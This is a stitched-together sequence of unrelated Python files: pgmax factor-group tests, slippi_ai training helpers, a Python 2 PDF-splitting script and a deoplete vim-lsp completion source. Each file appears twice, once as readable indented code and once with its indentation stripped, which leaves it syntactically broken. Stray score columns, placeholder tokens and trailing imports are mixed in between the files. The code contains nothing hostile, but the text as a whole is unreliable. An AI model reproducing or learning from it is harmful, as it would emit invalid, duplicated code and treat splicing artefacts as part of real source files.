        enumeration_factor_group = fgroup.EnumFactorGroup(
            variables_for_factors=[
                [vg[0, 0], vg[0, 1], vg[1, 1]],
                [vg[0, 1], vg[1, 0], vg[1, 1]],
            ],
            factor_configs=np.zeros((1, 3), dtype=int),
            log_potentials=np.zeros((2, 1), dtype=int),
        )
    # A valid group: two factors, each over a triple of 3-state variables.
    enumeration_factor_group = fgroup.EnumFactorGroup(
        variables_for_factors=[
            [vg[0, 0], vg[0, 1], vg[1, 1]],
            [vg[0, 1], vg[1, 0], vg[1, 1]],
        ],
        factor_configs=np.zeros((1, 3), dtype=int),
    )
    # Lookup: unknown variable sets raise, known sets return their factor.
    name = [vg[0, 0], vg[1, 1]]
    with pytest.raises(
        ValueError,
        match=re.escape(
            f"The queried factor connected to the set of variables {frozenset(name)} is not present in the factor group."
        ),
    ):
        enumeration_factor_group[name]
    assert (
        enumeration_factor_group[[vg[0, 1], vg[1, 0], vg[1, 1]]]
        == enumeration_factor_group.factors[1]
    )
    # flatten accepts only (2, 1), (2, 9) or (1,) shaped data.
    with pytest.raises(
        ValueError,
        match=re.escape(
            "data should be of shape (2, 1) or (2, 9) or (1,). Got (4, 5)."
        ),
    ):
        enumeration_factor_group.flatten(np.zeros((4, 5)))
    assert jnp.all(enumeration_factor_group.flatten(np.ones(1)) == jnp.ones(2))
    assert jnp.all(enumeration_factor_group.flatten(np.ones((2, 9))) == jnp.ones(18))
    # unflatten accepts only 1D input of a compatible size.
    with pytest.raises(
        ValueError, match=re.escape("Can only unflatten 1D array. Got a 3D array.")
    ):
        enumeration_factor_group.unflatten(jnp.ones((1, 2, 3)))
    with pytest.raises(
        ValueError,
        match=re.escape(
            "flat_data should be compatible with shape (2, 1) or (2, 9). Got (30,)"
        ),
    ):
        enumeration_factor_group.unflatten(jnp.zeros(30))
    assert jnp.all(
        enumeration_factor_group.unflatten(jnp.arange(2)) == jnp.array([[0], [1]])
    )
    assert jnp.all(enumeration_factor_group.unflatten(jnp.ones(18)) == jnp.ones((2, 9)))
def test_pairwise_factor_group():
    """Validation and flatten/unflatten behaviour of PairwiseFactorGroup."""
    vg = vgroup.NDVarArray(shape=(2, 2), num_states=3)
    # log_potential_matrix shape/dtype validation.
    with pytest.raises(
        ValueError, match=re.escape("log_potential_matrix should be either a 2D array")
    ):
        fgroup.PairwiseFactorGroup([[vg[0, 0], vg[1, 1]]], np.zeros((1,), dtype=float))
    with pytest.raises(
        ValueError, match=re.escape("Potential matrix should be floats")
    ):
        fgroup.PairwiseFactorGroup([[vg[0, 0], vg[1, 1]]], np.zeros((3, 3), dtype=int))
    # Leading dimension of a 3D matrix must match the number of factors.
    with pytest.raises(
        ValueError,
        match=re.escape(
            "Expected log_potential_matrix for 1 factors. Got log_potential_matrix for 2 factors."
        ),
    ):
        fgroup.PairwiseFactorGroup(
            [[vg[0, 0], vg[1, 1]]], np.zeros((2, 3, 3), dtype=float)
        )
    # Pairwise factors must connect exactly two variables.
    with pytest.raises(
        ValueError,
        match=re.escape(
            "All pairwise factors should connect to exactly 2 variables. Got a factor connecting to 3 variables"
        ),
    ):
        fgroup.PairwiseFactorGroup(
            [[vg[0, 0], vg[1, 1], vg[0, 1]]], np.zeros((3, 3), dtype=float)
        )
    # Matrix dimensions must match the variables' number of states (3, not 4).
    name = [vg[0, 0], vg[1, 1]]
    with pytest.raises(
        ValueError,
        match=re.escape(f"The specified pairwise factor {name}"),
    ):
        fgroup.PairwiseFactorGroup([name], np.zeros((4, 4), dtype=float))
    # A valid group with default potentials over two variable pairs.
    pairwise_factor_group = fgroup.PairwiseFactorGroup(
        [[vg[0, 0], vg[1, 1]], [vg[1, 0], vg[0, 1]]],
    )
    # flatten accepts only (2, 3, 3), (2, 6) or (3, 3) shaped data.
    with pytest.raises(
        ValueError,
        match=re.escape(
            "data should be of shape (2, 3, 3) or (2, 6) or (3, 3). Got (4, 4)."
        ),
    ):
        pairwise_factor_group.flatten(np.zeros((4, 4)))
    assert jnp.all(
        pairwise_factor_group.flatten(np.zeros((3, 3))) == jnp.zeros(2 * 3 * 3)
    )
    assert jnp.all(pairwise_factor_group.flatten(np.zeros((2, 6))) == jnp.zeros(12))
    # unflatten accepts only 1D input of a compatible size.
    with pytest.raises(ValueError, match="Can only unflatten 1D array. Got a 2D array"):
        pairwise_factor_group.unflatten(np.zeros((10, 20)))
    assert jnp.all(
        pairwise_factor_group.unflatten(np.zeros(2 * 3 * 3)) == jnp.zeros((2, 3, 3))
    )
    assert jnp.all(
        pairwise_factor_group.unflatten(np.zeros(2 * 6)) == jnp.zeros((2, 6))
    )
    with pytest.raises(
        ValueError,
        match=re.escape(
            "flat_data should be compatible with shape (2, 3, 3) or (2, 6). Got (10,)."
        ),
    ):
        pairwise_factor_group.unflatten(np.zeros(10))
import jax.numpy as jnp
import numpy as np
import pytest
from pgmax import fgroup, vgroup
def test_single_factor():
with pytest.raises(ValueError, match="Cannot create a FactorGroup with no Factor."):
fgroup.ORFactorGroup(variables_for_factors=[])
A = vgroup.NDVarArray(num_states=2, shape=(10,))
B = vgroup.NDVarArray(num_states=2, shape=(10,))
variables0 = (A[0], B[0])
variables1 = (A[1], B[1])
ORFactor0 = fgroup.ORFactorGroup(variables_for_factors=[variables0])
with pytest.raises(
ValueError, match="SingleFactorGroup should only contain one factor. Got 2"
):
fgroup.SingleFactorGroup(
variables_for_factors=[variables0, variables1],
factor=ORFactor0,
)
ORFactor1 = fgroup.ORFactorGroup(variables_for_factors=[variables1])
ORFactor0 < ORFactor1
def test_enumeration_factor_group():
    """Validation, lookup, flatten and unflatten behaviour of EnumFactorGroup."""
    vg = vgroup.NDVarArray(shape=(2, 2), num_states=3)
    # Mis-shaped log_potentials are rejected at construction time.
    with pytest.raises(
        ValueError,
        match=re.escape("Expected log potentials shape: (1,) or (2, 1). Got (3, 2)"),
    ):
        enumeration_factor_group = fgroup.EnumFactorGroup(
            variables_for_factors=[
                [vg[0, 0], vg[0, 1], vg[1, 1]],
                [vg[0, 1], vg[1, 0], vg[1, 1]],
            ],
            factor_configs=np.zeros((1, 3), dtype=int),
            log_potentials=np.zeros((3, 2)),
        )
    # Integer log potentials are rejected: potentials must be floats.
    with pytest.raises(ValueError, match=re.escape("Potentials should be floats")):
        enumeration_factor_group = fgroup.EnumFactorGroup(
            variables_for_factors=[
                [vg[0, 0], vg[0, 1], vg[1, 1]],
                [vg[0, 1], vg[1, 0], vg[1, 1]],
            ],
            factor_configs=np.zeros((1, 3), dtype=int),
            log_potentials=np.zeros((2, 1), dtype=int),
        )
    # Valid group: two factors over three variables each, one config.
    enumeration_factor_group = fgroup.EnumFactorGroup(
        variables_for_factors=[
            [vg[0, 0], vg[0, 1], vg[1, 1]],
            [vg[0, 1], vg[1, 0], vg[1, 1]],
        ],
        factor_configs=np.zeros((1, 3), dtype=int),
    )
    # Looking up a variable set that is not in the group raises.
    name = [vg[0, 0], vg[1, 1]]
    with pytest.raises(
        ValueError,
        match=re.escape(
            f"The queried factor connected to the set of variables {frozenset(name)} is not present in the factor group."
        ),
    ):
        enumeration_factor_group[name]
    assert (
        enumeration_factor_group[[vg[0, 1], vg[1, 0], vg[1, 1]]]
        == enumeration_factor_group.factors[1]
    )
    # flatten: accepts (2, 1), (2, 9) or (1,) shaped data only.
    with pytest.raises(
        ValueError,
        match=re.escape(
            "data should be of shape (2, 1) or (2, 9) or (1,). Got (4, 5)."
        ),
    ):
        enumeration_factor_group.flatten(np.zeros((4, 5)))
    assert jnp.all(enumeration_factor_group.flatten(np.ones(1)) == jnp.ones(2))
    assert jnp.all(enumeration_factor_group.flatten(np.ones((2, 9))) == jnp.ones(18))
    # unflatten: only 1D input of a compatible length is accepted.
    with pytest.raises(
        ValueError, match=re.escape("Can only unflatten 1D array. Got a 3D array.")
    ):
        enumeration_factor_group.unflatten(jnp.ones((1, 2, 3)))
    with pytest.raises(
        ValueError,
        match=re.escape(
            "flat_data should be compatible with shape (2, 1) or (2, 9). Got (30,)"
        ),
    ):
        enumeration_factor_group.unflatten(jnp.zeros(30))
    assert jnp.all(
        enumeration_factor_group.unflatten(jnp.arange(2)) == jnp.array([[0], [1]])
    )
    assert jnp.all(enumeration_factor_group.unflatten(jnp.ones(18)) == jnp.ones((2, 9)))
def test_pairwise_factor_group():
    """Validation, flatten and unflatten behaviour of PairwiseFactorGroup."""
    vg = vgroup.NDVarArray(shape=(2, 2), num_states=3)
    # log_potential_matrix must be a 2D (or batched 3D) array.
    with pytest.raises(
        ValueError, match=re.escape("log_potential_matrix should be either a 2D array")
    ):
        fgroup.PairwiseFactorGroup([[vg[0, 0], vg[1, 1]]], np.zeros((1,), dtype=float))
    # Integer potentials are rejected: potentials must be floats.
    with pytest.raises(
        ValueError, match=re.escape("Potential matrix should be floats")
    ):
        fgroup.PairwiseFactorGroup([[vg[0, 0], vg[1, 1]]], np.zeros((3, 3), dtype=int))
    # The leading batch dimension must match the number of factors.
    with pytest.raises(
        ValueError,
        match=re.escape(
            "Expected log_potential_matrix for 1 factors. Got log_potential_matrix for 2 factors."
        ),
    ):
        fgroup.PairwiseFactorGroup(
            [[vg[0, 0], vg[1, 1]]], np.zeros((2, 3, 3), dtype=float)
        )
    # Pairwise factors must connect exactly two variables.
    with pytest.raises(
        ValueError,
        match=re.escape(
            "All pairwise factors should connect to exactly 2 variables. Got a factor connecting to 3 variables"
        ),
    ):
        fgroup.PairwiseFactorGroup(
            [[vg[0, 0], vg[1, 1], vg[0, 1]]], np.zeros((3, 3), dtype=float)
        )
    # Matrix dimensions must match the variables' number of states.
    name = [vg[0, 0], vg[1, 1]]
    with pytest.raises(
        ValueError,
        match=re.escape(f"The specified pairwise factor {name}"),
    ):
        fgroup.PairwiseFactorGroup([name], np.zeros((4, 4), dtype=float))
    # Valid group: two pairwise factors, default (uniform) potentials.
    pairwise_factor_group = fgroup.PairwiseFactorGroup(
        [[vg[0, 0], vg[1, 1]], [vg[1, 0], vg[0, 1]]],
    )
    # flatten: accepts (2, 3, 3), (2, 6) or a shared (3, 3) matrix.
    with pytest.raises(
        ValueError,
        match=re.escape(
            "data should be of shape (2, 3, 3) or (2, 6) or (3, 3). Got (4, 4)."
        ),
    ):
        pairwise_factor_group.flatten(np.zeros((4, 4)))
    assert jnp.all(
        pairwise_factor_group.flatten(np.zeros((3, 3))) == jnp.zeros(2 * 3 * 3)
    )
    assert jnp.all(pairwise_factor_group.flatten(np.zeros((2, 6))) == jnp.zeros(12))
    # unflatten: only 1D input of a compatible length is accepted.
    with pytest.raises(ValueError, match="Can only unflatten 1D array. Got a 2D array"):
        pairwise_factor_group.unflatten(np.zeros((10, 20)))
    assert jnp.all(
        pairwise_factor_group.unflatten(np.zeros(2 * 3 * 3)) == jnp.zeros((2, 3, 3))
    )
    assert jnp.all(
        pairwise_factor_group.unflatten(np.zeros(2 * 6)) == jnp.zeros((2, 6))
    )
    with pytest.raises(
        ValueError,
        match=re.escape(
            "flat_data should be compatible with shape (2, 3, 3) or (2, 6). Got (10,)."
        ),
    ):
        pairwise_factor_group.unflatten(np.zeros(10))
import datetime
from typing import Iterator, Tuple
import os
import secrets
import numpy as np
import tensorflow as tf
import tree
from slippi_ai import data, utils, embed
from slippi_ai.learner import Learner
def get_experiment_tag():
    """Return a unique experiment tag of the form 'YYYY-M-D_<16 hex chars>'."""
    date = datetime.date.today()
    random_suffix = secrets.token_hex(8)
    return '{}-{}-{}_{}'.format(date.year, date.month, date.day, random_suffix)
def get_experiment_directory():
    """Create (if needed) and return a fresh directory for experiment artifacts.

    The directory holds tf checkpoints and other per-run outputs.
    """
    path = f'experiments/{get_experiment_tag()}'
    os.makedirs(path, exist_ok=True)
    return path
# necessary because our dataset has some mismatching types, which ultimately
# come from libmelee occasionally giving differently-typed data
# Won't be necessary if we re-generate the dataset.
embed_game = embed.make_game_embedding()
def sanitize_game(game: data.CompressedGame) -> data.CompressedGame:
    """Cast every state array to the dtype declared by the game embedding."""
    cast_states = embed_game.map(
        lambda embedding, array: array.astype(embedding.dtype), game.states)
    return game._replace(states=cast_states)
def sanitize_batch(batch: data.Batch) -> data.Batch:
    """Return *batch* with its game states cast to the embedding dtypes."""
    clean_game = sanitize_game(batch.game)
    return batch._replace(game=clean_game)
class TrainManager:
    """Drives the training loop: pulls batches, runs learner steps, tracks stats."""

    def __init__(
        self,
        learner: Learner,
        data_source: Iterator[Tuple[data.Batch, float]],
        step_kwargs={},
    ):
        # NOTE(review): mutable default for step_kwargs is shared across
        # instances; safe only as long as callers never mutate it.
        self.learner = learner
        self.data_source = data_source
        # NOTE(review): assumes data_source exposes batch_size despite the
        # plain Iterator annotation -- confirm the concrete source type.
        self.hidden_state = learner.policy.initial_state(data_source.batch_size)
        self.step_kwargs = step_kwargs
        self.total_frames = 0
        # Separate profilers for data loading vs. the learner update.
        self.data_profiler = utils.Profiler()
        self.step_profiler = utils.Profiler()

    def step(self) -> dict:
        """Run one training step and return the learner's stats dict.

        The recurrent hidden state is threaded through successive calls.
        """
        with self.data_profiler:
            batch, epoch = next(self.data_source)
            batch = sanitize_batch(batch)
        with self.step_profiler:
            stats, self.hidden_state = self.learner.compiled_step(
                batch, self.hidden_state, **self.step_kwargs)
        # presumably counts are zero-based per-sequence frame counts,
        # hence the +1 -- TODO confirm against data.CompressedGame.
        num_frames = np.sum(batch.game.counts + 1)
        self.total_frames += num_frames
        stats.update(
            epoch=epoch,
            num_frames=num_frames,
            total_frames=self.total_frames,
        )
        return stats
def log_stats(ex, stats, step=None, sep='.'):
    """Log a (possibly nested) stats structure to an experiment object.

    Each leaf is reduced to a scalar (tf.Tensor -> numpy, ndarray -> mean)
    and logged under a key formed by joining its path with *sep*.

    Args:
        ex: experiment-like object exposing log_scalar(key, value, step=...).
        stats: arbitrarily nested structure of scalars/arrays/tensors.
        step: optional step index forwarded to log_scalar.
        sep: separator used to join the key path.
    """
    def log(path, value):
        if isinstance(value, tf.Tensor):
            value = value.numpy()
        if isinstance(value, np.ndarray):
            value = value.mean()
        key = sep.join(map(str, path))
        ex.log_scalar(key, value, step=step)
    tree.map_structure_with_path(log, stats)
from typing import Iterator, Tuple
import os
import secrets
import numpy as np
import tensorflow as tf
import tree
from slippi_ai import data, utils, embed
from slippi_ai.learner import Learner
def get_experiment_tag():
today = datetime.date.today()
return f'{today.year}-{today.month}-{today.day}_{secrets.token_hex(8)}'
def get_experiment_directory():
# create directory for tf checkpoints and other experiment artifacts
expt_dir = f'experiments/{get_experiment_tag()}'
os.makedirs(expt_dir, exist_ok=True)
return expt_dir
# necessary because our dataset has some mismatching types, which ultimately
# come from libmelee occasionally giving differently-typed data
# Won't be necessary if we re-generate the dataset.
embed_game = embed.make_game_embedding()
def sanitize_game(game: data.CompressedGame) -> data.CompressedGame:
"""Casts inputs to the right dtype and discard unused inputs."""
gamestates = embed_game.map(lambda e, a: a.astype(e.dtype), game.states)
return game._replace(states=gamestates)
def sanitize_batch(batch: data.Batch) -> data.Batch:
return batch._replace(game=sanitize_game(batch.game))
class TrainManager:
def __init__(
self,
learner: Learner,
data_source: Iterator[Tuple[data.Batch, float]],
step_kwargs={},
):
self.learner = learner
self.data_source = data_source
self.hidden_state = learner.policy.initial_state(data_source.batch_size)
self.step_kwargs = step_kwargs
self.total_frames = 0
self.data_profiler = utils.Profiler()
self.step_profiler = utils.Profiler()
def step(self) -> dict:
with self.data_profiler:
batch, epoch = next(self.data_source)
batch = sanitize_batch(batch)
with self.step_profiler:
stats, self.hidden_state = self.learner.compiled_step(
batch, self.hidden_state, **self.step_kwargs)
num_frames = np.sum(batch.game.counts + 1)
self.total_frames += num_frames
stats.update(
epoch=epoch,
num_frames=num_frames,
total_frames=self.total_frames,
)
return stats
def log_stats(ex, stats, step=None, sep='.'):
def log(path, value):
if isinstance(value, tf.Tensor):
value = value.numpy()
if isinstance(value, np.ndarray):
value = value.mean()
key = sep.join(map(str, path))
ex.log_scalar(key, value, step=step)
tree.map_structure_with_path(log, stats) | 0.801042 | 0.224427 |
__author__ = '<EMAIL> (<NAME>)'
import sys
import os
from CoreGraphics import *
def Usage ():
    # Print the command-line usage help for this script to stdout.
    print """
Usage: splitPDF.py inputFN splitPageNum1 splitPageNum2 ...
  - inputFN: the path to the input pdf file.
  - splitPageNum1, ...: each one is a positive integer; the numbers
    must not exceed the number of pages of the input file, and the
    entire sequence must be strictly increasing.
Example: splitPDF.py input.pdf 3 5
This will split file input.pdf into 3 files (assuming input.pdf is 10
pages long):
  - input.part1.1_3.pdf contains page 1-3;
  - input.part2.4_5.pdf contains page 4-5;
  - input.part3.6_10.pdf contains page 6-10.
"""
# Require at least the input file and one split page number.
if len(sys.argv) < 3:
    Usage()
    sys.exit(1)
else:
    inputFN = sys.argv[1]
# Open the input PDF through a CoreGraphics data provider.
inputDoc = \
    CGPDFDocumentCreateWithProvider(\
    CGDataProviderCreateWithFilename(inputFN))
if inputDoc:
    maxPages = inputDoc.getNumberOfPages()
    print '%s has %d pages' % (inputFN, maxPages)
else:
    # The input file could not be opened or parsed as a PDF.
    sys.exit(2)
try:
splitPageNums = map(int, sys.argv[2:])
except:
print 'Error: invalid split page number(s).'
for i, splitPageNum in enumerate(splitPageNums):
if splitPageNum < 1 or splitPageNum > maxPages:
print 'Error: a split page number must be >= 1 and <= %d.' % \
maxPages
sys.exit(3)
elif i and splitPageNums[i - 1] >= splitPageNum:
print 'Error: split page numbers must be increasing.'
sys.exit(4)
baseFN = os.path.splitext(os.path.basename(inputFN))[0]
# Page rect used to create the write context (US Letter, in points);
# each page is actually drawn with its own media box below.
pageRect = CGRectMake (0, 0, 612, 792)
# Ensure the final segment extends to the last page of the document.
if splitPageNums[-1] < maxPages:
    splitPageNums.append(maxPages)
startPageNum = 1
for i, splitPageNum in enumerate(splitPageNums):
    # Output name encodes part index and page range, e.g. in.part1.1_3.pdf.
    outputFN = '%s.part%d.%d_%d.pdf' % \
        (baseFN, i + 1, startPageNum, splitPageNum)
    writeContext = CGPDFContextCreateWithFilename(outputFN, pageRect)
    print 'Writing page %d-%d to %s...' % \
        (startPageNum, splitPageNum, outputFN)
    # Copy each page of this segment using its original media box.
    for pageNum in xrange(startPageNum, splitPageNum + 1):
        mediaBox = inputDoc.getMediaBox(pageNum)
        writeContext.beginPage(mediaBox)
        writeContext.drawPDFDocument(mediaBox, inputDoc, pageNum)
        writeContext.endPage()
    startPageNum = splitPageNum + 1
print 'Done: %d file(s) generated.' % len(splitPageNums)
import sys
import os
from CoreGraphics import *
def Usage ():
print """
Usage: splitPDF.py inputFN splitPageNum1 splitPageNum2 ...
- inputFN: the path to the input pdf file.
- splitPageNum1, ...: each one is a positive integer; the numbers
must not exceed the number of pages of the input file, and the
entire sequence must be strictly increasing.
Example: splitPDF.py input.pdf 3 5
This will split file input.pdf into 3 files (assuming input.pdf is 10
pages long):
- input.part1.1_3.pdf contains page 1-3;
- input.part2.4_5.pdf contains page 4-5;
- input.part3.6_10.pdf contains page 6-10.
"""
if len(sys.argv) < 3:
Usage()
sys.exit(1)
else:
inputFN = sys.argv[1]
inputDoc = \
CGPDFDocumentCreateWithProvider(\
CGDataProviderCreateWithFilename(inputFN))
if inputDoc:
maxPages = inputDoc.getNumberOfPages()
print '%s has %d pages' % (inputFN, maxPages)
else:
sys.exit(2)
try:
splitPageNums = map(int, sys.argv[2:])
except:
print 'Error: invalid split page number(s).'
for i, splitPageNum in enumerate(splitPageNums):
if splitPageNum < 1 or splitPageNum > maxPages:
print 'Error: a split page number must be >= 1 and <= %d.' % \
maxPages
sys.exit(3)
elif i and splitPageNums[i - 1] >= splitPageNum:
print 'Error: split page numbers must be increasing.'
sys.exit(4)
baseFN = os.path.splitext(os.path.basename(inputFN))[0]
pageRect = CGRectMake (0, 0, 612, 792)
if splitPageNums[-1] < maxPages:
splitPageNums.append(maxPages)
startPageNum = 1
for i, splitPageNum in enumerate(splitPageNums):
outputFN = '%s.part%d.%d_%d.pdf' % \
(baseFN, i + 1, startPageNum, splitPageNum)
writeContext = CGPDFContextCreateWithFilename(outputFN, pageRect)
print 'Writing page %d-%d to %s...' % \
(startPageNum, splitPageNum, outputFN)
for pageNum in xrange(startPageNum, splitPageNum + 1):
mediaBox = inputDoc.getMediaBox(pageNum)
writeContext.beginPage(mediaBox)
writeContext.drawPDFDocument(mediaBox, inputDoc, pageNum)
writeContext.endPage()
startPageNum = splitPageNum + 1
print 'Done: %d file(s) generated.' % len(splitPageNums) | 0.164752 | 0.261393 |
import re
import time
from deoplete.source.base import Base
LSP_KINDS = [
'Text',
'Method',
'Function',
'Constructor',
'Field',
'Variable',
'Class',
'Interface',
'Module',
'Property',
'Unit',
'Value',
'Enum',
'Keyword',
'Snippet',
'Color',
'File',
'Reference',
'Folder',
'EnumMember',
'Constant',
'Struct',
'Event',
'Operator',
'TypeParameter',
]
class Source(Base):
    """Deoplete completion source that proxies requests to vim-lsp.

    Requests are fired via deoplete_vim_lsp#request on the Vim side;
    results come back asynchronously through the shared
    g:deoplete#source#vim_lsp#_* variables ("mailbox" pattern).
    """

    def __init__(self, vim):
        Base.__init__(self, vim)
        self.name = 'lsp'
        self.mark = '[lsp]'
        self.rank = 500
        self.is_volatile = True
        self.input_pattern = r'[^\w\s]$'
        self.events = ['BufEnter']
        self.vars = {}
        # Mailbox variables shared with the Vim side: the raw results, the
        # context they were requested for, and a "response ready" flag.
        self.vim.vars['deoplete#source#vim_lsp#_results'] = []
        self.vim.vars['deoplete#source#vim_lsp#_context'] = {}
        self.vim.vars['deoplete#source#vim_lsp#_requested'] = False
        # Server list and capabilities are cached; invalidated on BufEnter.
        self.server_names = None
        self.server_capabilities = {}
        self.server_infos = {}
        self.buf_changed = False

    def on_event(self, context):
        # Invalidate the cached server list when entering another buffer.
        if context['event'] == 'BufEnter':
            self.buf_changed = True

    def gather_candidates(self, context):
        """Entry point called by deoplete to collect completion candidates.

        Only the first completion-capable whitelisted server is queried.
        """
        if not self.server_names or self.buf_changed:
            self.server_names = self.vim.call('lsp#get_whitelisted_servers')
            self.buf_changed = False
        for server_name in self.server_names:
            # Fetch (and cache) capabilities; skip servers that do not
            # advertise completionProvider.
            if server_name not in self.server_capabilities:
                self.server_capabilities[server_name] = self.vim.call(
                    'lsp#get_server_capabilities', server_name)
            if not self.server_capabilities[server_name].get(
                    'completionProvider', False):
                continue
            if self.is_auto_complete():
                return self.async_completion(server_name, context)
            return self.sync_completion(server_name, context)
        return []

    def sync_completion(self, server_name, context):
        """Request completion and poll for the response (manual completion).

        Polls the mailbox up to 10 times with a 10ms sleep (~100ms budget).
        """
        self.request_lsp_completion(server_name, context)
        cnt = 0
        while True:
            cnt += 1
            if cnt > 10:
                # request timeout
                break
            if self.vim.vars['deoplete#source#vim_lsp#_requested']:
                if match_context(
                    context,
                    self.vim.vars['deoplete#source#vim_lsp#_context']
                ):
                    return self.process_candidates()
            time.sleep(0.01)
        return []

    def async_completion(self, server_name, context):
        """Return candidates if a response for this context already arrived;
        otherwise (re)issue the request and return nothing for now."""
        if self.vim.vars['deoplete#source#vim_lsp#_requested']:
            if match_context(
                context,
                self.vim.vars['deoplete#source#vim_lsp#_context']
            ):
                return self.process_candidates()
            # Response belongs to an older cursor position: re-request.
            self.request_lsp_completion(server_name, context)
        # NOTE(review): the request is issued again unconditionally here
        # ("dismiss completion" in the original); presumably intentional to
        # clear a stale popup -- confirm before changing.
        self.request_lsp_completion(server_name, context)
        return []

    def request_lsp_completion(self, server_name, context):
        """Fire an asynchronous completion request through Vim script."""
        # Clear the flag; the Vim side sets it once results are stored.
        self.vim.vars['deoplete#source#vim_lsp#_requested'] = False
        self.vim.call(
            'deoplete_vim_lsp#request',
            server_name,
            create_option_to_vimlsp(server_name),
            create_context_to_vimlsp(context),
        )

    def process_candidates(self):
        """Convert the stored LSP completion response into deoplete items."""
        candidates = []
        results = self.vim.vars['deoplete#source#vim_lsp#_results']
        # response is `CompletionList`
        if isinstance(results, dict):
            if 'items' not in results:
                self.print_error(
                    'LSP results does not have "items" key:{}'.format(
                        str(results)))
                return candidates
            items = results['items']
        # response is `CompletionItem[]`
        elif isinstance(results, list):
            items = results
        # invalid response
        else:
            return candidates
        if items is None:
            return candidates
        for rec in items:
            # Prefer insertText only when it is plain text
            # (insertTextFormat == 1); otherwise fall back to the label.
            if rec.get('insertText', ''):
                if rec.get('insertTextFormat', 0) != 1:
                    word = rec.get('entryName', rec.get('label'))
                else:
                    word = rec['insertText']
            else:
                word = rec.get('entryName', rec.get('label'))
            item = {
                # Strip a trailing parameter list like "(...)" from the word.
                'word': re.sub(r'\([^)]*\)', '', word),
                'abbr': rec['label'],
                'dup': 0,
            }
            if 'kind' in rec:
                # LSP kind is 1-based; map it to a human-readable name.
                item['kind'] = LSP_KINDS[rec['kind'] - 1]
            if 'detail' in rec and rec['detail']:
                item['info'] = rec['detail']
                if self.vim.vars['deoplete#sources#vim_lsp#show_info']:
                    item['menu'] = rec['detail']
            candidates.append(item)
        return candidates

    def is_auto_complete(self):
        # Whether deoplete is configured for automatic completion.
        return self.vim.call(
            'deoplete#custom#_get_option',
            'auto_complete',
        )
def create_option_to_vimlsp(server_name):
    """Build the option dict passed to deoplete_vim_lsp#request for *server_name*."""
    return {'name': f'deoplete_lsp_{server_name}'}
def create_context_to_vimlsp(context):
    """Translate a deoplete context dict into the shape vim-lsp expects."""
    position = context['position']
    return {
        'curpos': position,
        'lnum': position[1],
        'col': position[2],
        'bufnr': context['bufnr'],
        'changedtick': context['changedtick'],
        'typed': context['input'],
        'filetype': context['filetype'],
        'filepath': context['bufpath'],
    }
def match_context(deoplete_context, vim_lsp_context):
    """Return True when both contexts point at the same cursor position.

    Positions are compared as "lnum:col" strings so that int and str
    values coming from Vim compare equal.
    """
    deoplete_key = '{}:{}'.format(
        deoplete_context['position'][1], deoplete_context['position'][2])
    lsp_key = '{}:{}'.format(vim_lsp_context['lnum'], vim_lsp_context['col'])
    return deoplete_key == lsp_key
import time
from deoplete.source.base import Base
LSP_KINDS = [
'Text',
'Method',
'Function',
'Constructor',
'Field',
'Variable',
'Class',
'Interface',
'Module',
'Property',
'Unit',
'Value',
'Enum',
'Keyword',
'Snippet',
'Color',
'File',
'Reference',
'Folder',
'EnumMember',
'Constant',
'Struct',
'Event',
'Operator',
'TypeParameter',
]
class Source(Base):
def __init__(self, vim):
Base.__init__(self, vim)
self.name = 'lsp'
self.mark = '[lsp]'
self.rank = 500
self.is_volatile = True
self.input_pattern = r'[^\w\s]$'
self.events = ['BufEnter']
self.vars = {}
self.vim.vars['deoplete#source#vim_lsp#_results'] = []
self.vim.vars['deoplete#source#vim_lsp#_context'] = {}
self.vim.vars['deoplete#source#vim_lsp#_requested'] = False
self.server_names = None
self.server_capabilities = {}
self.server_infos = {}
self.buf_changed = False
def on_event(self, context):
if context['event'] == 'BufEnter':
self.buf_changed = True
def gather_candidates(self, context):
if not self.server_names or self.buf_changed:
self.server_names = self.vim.call('lsp#get_whitelisted_servers')
self.buf_changed = False
for server_name in self.server_names:
if server_name not in self.server_capabilities:
self.server_capabilities[server_name] = self.vim.call(
'lsp#get_server_capabilities', server_name)
if not self.server_capabilities[server_name].get(
'completionProvider', False):
continue
if self.is_auto_complete():
return self.async_completion(server_name, context)
return self.sync_completion(server_name, context)
return []
def sync_completion(self, server_name, context):
self.request_lsp_completion(server_name, context)
cnt = 0
while True:
cnt += 1
if cnt > 10:
# request timeout
break
if self.vim.vars['deoplete#source#vim_lsp#_requested']:
if match_context(
context,
self.vim.vars['deoplete#source#vim_lsp#_context']
):
return self.process_candidates()
time.sleep(0.01)
return []
def async_completion(self, server_name, context):
if self.vim.vars['deoplete#source#vim_lsp#_requested']:
if match_context(
context,
self.vim.vars['deoplete#source#vim_lsp#_context']
):
return self.process_candidates()
# old position completion
self.request_lsp_completion(server_name, context)
# dissmiss completion
self.request_lsp_completion(server_name, context)
return []
def request_lsp_completion(self, server_name, context):
self.vim.vars['deoplete#source#vim_lsp#_requested'] = False
self.vim.call(
'deoplete_vim_lsp#request',
server_name,
create_option_to_vimlsp(server_name),
create_context_to_vimlsp(context),
)
def process_candidates(self):
candidates = []
results = self.vim.vars['deoplete#source#vim_lsp#_results']
# response is `CompletionList`
if isinstance(results, dict):
if 'items' not in results:
self.print_error(
'LSP results does not have "items" key:{}'.format(
str(results)))
return candidates
items = results['items']
# response is `CompletionItem[]`
elif isinstance(results, list):
items = results
# invalid response
else:
return candidates
if items is None:
return candidates
for rec in items:
if rec.get('insertText', ''):
if rec.get('insertTextFormat', 0) != 1:
word = rec.get('entryName', rec.get('label'))
else:
word = rec['insertText']
else:
word = rec.get('entryName', rec.get('label'))
item = {
'word': re.sub(r'\([^)]*\)', '', word),
'abbr': rec['label'],
'dup': 0,
}
if 'kind' in rec:
item['kind'] = LSP_KINDS[rec['kind'] - 1]
if 'detail' in rec and rec['detail']:
item['info'] = rec['detail']
if self.vim.vars['deoplete#sources#vim_lsp#show_info']:
item['menu'] = rec['detail']
candidates.append(item)
return candidates
def is_auto_complete(self):
return self.vim.call(
'deoplete#custom#_get_option',
'auto_complete',
)
def create_option_to_vimlsp(server_name):
return {'name': 'deoplete_lsp_{}'.format(server_name)}
def create_context_to_vimlsp(context):
return {
'curpos': context['position'],
'lnum': context['position'][1],
'col': context['position'][2],
'bufnr': context['bufnr'],
'changedtick': context['changedtick'],
'typed': context['input'],
'filetype': context['filetype'],
'filepath': context['bufpath']
}
def match_context(deoplete_context, vim_lsp_context):
position_key_deoplete = '{}:{}'.format(
deoplete_context['position'][1],
deoplete_context['position'][2],
)
position_key_lsp = '{}:{}'.format(
vim_lsp_context['lnum'],
vim_lsp_context['col'],
)
if position_key_deoplete == position_key_lsp:
return True
return False | 0.264833 | 0.063308 |
import json
import os
import subprocess
